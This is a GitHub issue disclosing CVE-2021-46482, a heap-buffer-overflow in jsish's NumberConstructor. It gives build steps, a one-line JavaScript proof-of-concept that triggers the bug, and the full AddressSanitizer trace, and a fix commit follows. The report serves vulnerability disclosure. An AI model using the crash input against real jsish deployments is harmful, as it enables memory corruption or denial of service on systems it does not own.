CVE-2021-46482: Heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor · Issue #66 · pcmacdon/jsish

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

Comments

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS=’-fsanitize=address’ make

Test case

var a = [ [0] ]; var actual = (Number).bind("abcdab", [ [0] ].indexOf("abcdab", 99))();

​

Execution steps & Output

$ ./jsish/jsish poc.js

==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018b40 at pc 0x55803d35220a bp 0x7fff119980c0 sp 0x7fff119980b0 WRITE of size 4 at 0x604000018b40 thread T0 #0 0x55803d352209 in NumberConstructor src/jsiNumber.c:93 #1 0x55803d325818 in jsi_FuncCallSub src/jsiProto.c:244 #2 0x55803d2a2fec in jsi_FunctionInvoke src/jsiFunc.c:777 #3 0x55803d2a2fec in Jsi_FunctionInvoke src/jsiFunc.c:789 #4 0x55803d31ead6 in jsi_FuncBindCall src/jsiProto.c:299 #5 0x55803d325818 in jsi_FuncCallSub src/jsiProto.c:244 #6 0x55803d5ef71a in jsiFunctionSubCall src/jsiEval.c:796 #7 0x55803d5ef71a in jsiEvalFunction src/jsiEval.c:837 #8 0x55803d5ef71a in jsiEvalCodeSub src/jsiEval.c:1264 #9 0x55803d60315e in jsi_evalcode src/jsiEval.c:2204 #10 0x55803d607274 in jsi_evalStrFile src/jsiEval.c:2665 #11 0x55803d2f666a in Jsi_Main src/jsiInterp.c:936 #12 0x55803dafb03a in jsi_main src/main.c:47 #13 0x7ff56e70cbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #14 0x55803d28a969 in _start (/usr/local/bin/jsish+0xe8969)

0x604000018b40 is located 1 bytes to the right of 47-byte region [0x604000018b10,0x604000018b3f) allocated by thread T0 here: #0 0x7ff56f37bd28 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded28) #1 0x55803d2fbaa4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor Shadow bytes around the buggy address: 0x0c087fffb110: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00 0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb140: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 07 0x0c087fffb150: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa =>0x0c087fffb160: fa fa 00 00 00 00 00 07[fa]fa 00 00 00 00 00 00 0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb190: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa 0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa 0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb

Credits: Found by OWL337 team.

pcmacdon pushed a commit that referenced this issue

Dec 24, 2021

FossilOrigin-Name: 1a56f37adc0f00cd3e9e467873c4578299d4ac474be20f2e2658a05da20c32bc

2 participants